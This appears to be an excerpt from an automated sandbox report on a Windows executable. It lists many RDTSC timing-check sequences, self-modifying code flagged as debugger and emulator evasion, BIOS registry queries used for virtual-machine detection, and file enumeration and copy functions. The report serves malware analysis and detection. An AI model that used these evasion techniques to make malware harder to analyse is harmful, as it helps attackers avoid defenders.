                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB02F second address: 7FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8035C1 second address: 8035F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E50Ah 0x00000009 popad 0x0000000a ja 00007F402CC7E519h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8035F5 second address: 8035F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80173D second address: 801741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801741 second address: 80174D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F402CDD4F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80174D second address: 80175D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F402CC7E512h 0x00000008 jp 00007F402CC7E506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80188E second address: 801892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801892 second address: 801896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801896 second address: 8018AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a jnc 00007F402CDD4F62h 0x00000010 jne 00007F402CDD4F56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801BAB second address: 801BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801D31 second address: 801D3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F402CDD4F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801D3B second address: 801D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802580 second address: 802584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802584 second address: 80259B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E511h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80259B second address: 8025BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F402CDD4F5Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802D57 second address: 802D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802D5D second address: 802D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F402CDD4F56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CDD4F61h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80342F second address: 803440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F402CC7E506h 0x0000000a jg 00007F402CC7E506h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C05E second address: 80C074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F402CDD4F5Fh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C074 second address: 80C080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F402CC7E506h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AF96 second address: 81AF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AE87 second address: 81AE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E052 second address: 81E079 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F69h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E079 second address: 81E0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F402CC7E519h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E1C4 second address: 81E1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E1C8 second address: 81E1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D73 second address: 823D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D79 second address: 823D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F402CC7E50Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823D8C second address: 823DA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F402CDD4F63h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823DA9 second address: 823DAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823DAF second address: 823DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CDD4F66h 0x00000014 jnc 00007F402CDD4F56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DC36 second address: 82DC3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83006E second address: 83007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835FC2 second address: 835FE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F402CC7E517h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836557 second address: 83655F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83655F second address: 836567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836824 second address: 836842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836842 second address: 83685E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CC7E516h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8373B9 second address: 8373E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F402CDD4F63h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BFF4 second address: 84C013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 jmp 00007F402CC7E516h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C013 second address: 84C02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jbe 00007F402CDD4F56h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C02B second address: 84C031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CFEC second address: 74CFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A17F second address: 85A1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Ah 0x00000007 jc 00007F402CC7E506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007F402CC7E506h 0x00000016 jmp 00007F402CC7E514h 0x0000001b popad 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 jmp 00007F402CC7E517h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F402CC7E50Bh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A1DA second address: 85A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A356 second address: 85A35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A35C second address: 85A361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A361 second address: 85A368 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868F0F second address: 868F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868F15 second address: 868F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869065 second address: 8690C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F402CDD4F5Fh 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F402CDD4F56h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F402CDD4F63h 0x0000001c jmp 00007F402CDD4F5Ch 0x00000021 popad 0x00000022 jmp 00007F402CDD4F5Fh 0x00000027 pushad 0x00000028 jnc 00007F402CDD4F56h 0x0000002e jo 00007F402CDD4F56h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8691F8 second address: 8691FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8691FC second address: 869200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869200 second address: 86920E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F402CC7E506h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86920E second address: 869219 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869219 second address: 86922B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F402CC7E506h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86922B second address: 869231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869231 second address: 869237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86951E second address: 869526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B60A second address: 86B62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F402CC7E506h 0x0000000b jmp 00007F402CC7E518h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E216 second address: 86E264 instructions: 0x00000000 rdtsc 0x00000002 js 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F402CDD4F63h 0x00000013 mov edx, dword ptr [ebp+122D2BC7h] 0x00000019 push 00000004h 0x0000001b mov dh, bl 0x0000001d call 00007F402CDD4F59h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F402CDD4F68h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E264 second address: 86E2C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F402CC7E512h 0x00000011 jmp 00007F402CC7E519h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F402CC7E50Ch 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E2C4 second address: 86E2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jc 00007F402CDD4F60h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E2D9 second address: 86E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E2E7 second address: 86E2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FAD8 second address: 86FAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jne 00007F402CC7E506h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FAE6 second address: 86FAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FAEC second address: 86FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F402CC7E516h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FB19 second address: 86FB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871C8E second address: 871C9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871C9A second address: 871CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F402CDD4F56h 0x0000000a jns 00007F402CDD4F56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871CAA second address: 871CB8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757026 second address: 757030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757030 second address: 75703C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75703C second address: 75706A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F402CDD4F66h 0x00000008 jbe 00007F402CDD4F56h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F402CDD4F5Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75706A second address: 75706E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02BB second address: 4ED031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F402CDD4F60h 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F402CDD4F67h 0x0000001a sbb ah, FFFFFFBEh 0x0000001d jmp 00007F402CDD4F69h 0x00000022 popfd 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED031A second address: 4ED0371 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov esi, 30248F1Bh 0x00000011 jmp 00007F402CC7E510h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F402CC7E510h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, 664DAD30h 0x00000027 jmp 00007F402CC7E519h 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03D2 second address: 4ED042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F402CDD4F62h 0x00000009 or ch, FFFFFF98h 0x0000000c jmp 00007F402CDD4F5Bh 0x00000011 popfd 0x00000012 jmp 00007F402CDD4F68h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F402CDD4F60h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED042B second address: 4ED042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED042F second address: 4ED0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0433 second address: 4ED0439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0439 second address: 4ED043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED043F second address: 4ED0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942B2 second address: 7942BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 762FD8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7889D0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DF0DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7AD8D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 811FB4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E109A rdtsc 0_2_005E109A
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00394910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0038DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0038E430
